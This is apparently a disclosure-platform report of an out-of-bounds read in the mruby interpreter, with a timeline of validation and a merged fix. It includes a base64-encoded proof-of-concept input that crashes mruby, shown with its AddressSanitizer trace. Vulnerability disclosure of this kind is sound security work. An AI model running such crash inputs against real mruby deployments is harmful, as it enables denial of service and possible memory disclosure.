Out-of-bounds Read in mruby/mruby

Valid

Reported on

Feb 8th 2022


Description

commit 4e8ab145da52c3cfb0bd4b823df8041dcc52f454

Author: Yukihiro "Matz" Matsumoto matz@ruby.or.jp

Date: Tue Feb 8 13:03:51 2022 +0900

Proof of Concept

$ echo -ne "e30KWyoqMCxtOjBdBHM9MDYudGl0ZXN7My7+////c3slXSN7W11lYWsKYj17fQpbKiowLG06MF3/
f///jn11EHRpbC1icmWeawpiPXt99FsqKkBidWYwXX9zPTB9XX1hLiF+IBD///wAAPoAoqKion19
AACA/wENXH9dXGM/ICphID0gKCkgYW1iZCVcX0JO//4AACA8ACpbAAB7KQ==" | base64 -d > poc
$ cat poc
{}
[**0,m:0]s=06.tites{3.����s{%]#{[]eak
b={}
[**0,m:0]����}util-bre�k
\]\c? *a = () ambd%\_BN�� <*[{)#
$ ./bin/mruby ./poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1898947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x00000059dca6 bp 0x7ffd8e5ac2b0 sp 0x7ffd8e5ab390 T0)
==1898947==The signal is caused by a READ memory access.
==1898947==Hint: address points to the zero page.
    #0 0x59dca6 in mrb_check_frozen /root/fuzz/mruby/include/mruby.h:1418:7
    #1 0x59dca6 in hash_modify /root/fuzz/mruby/src/hash.c:1154:3
    #2 0x59dca6 in mrb_hash_set /root/fuzz/mruby/src/hash.c:1242:3
    #3 0x4e5273 in mrb_vm_exec /root/fuzz/mruby/src/vm.c:2771:9
    #4 0x4d77de in mrb_vm_run /root/fuzz/mruby/src/vm.c:1128:12
    #5 0x5e83a2 in mrb_load_exec /root/fuzz/mruby/mrbgems/mruby-compiler/core/parse.y:6883:7
    #6 0x5e9293 in mrb_load_detect_file_cxt /root/fuzz/mruby/mrbgems/mruby-compiler/core/parse.y:6926:12
    #7 0x4cb88b in main /root/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #8 0x7fb293420564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #9 0x41d7ad in _start (/root/fuzz/mruby/bin/mruby+0x41d7ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/fuzz/mruby/include/mruby.h:1418:7 in mrb_check_frozen
==1898947==ABORTING

Impact

Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

Acknowledgement

Thanks to alkyne Choi

We are processing your report and will contact the mruby team within 24 hours. 4 months ago
Pocas modified the report
4 months ago
Pocas modified the report
4 months ago
Pocas modified the report
4 months ago
Pocas modified the report
4 months ago
We have contacted a member of the mruby team and are waiting to hear back 4 months ago
Pocas
4 months ago

Researcher


hey

We have sent a follow up to the mruby team. We will try again in 7 days. 4 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 3 months ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on ff3a5e 3 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
Yukihiro
3 months ago

Maintainer


Sorry for being late to check.

to join this conversation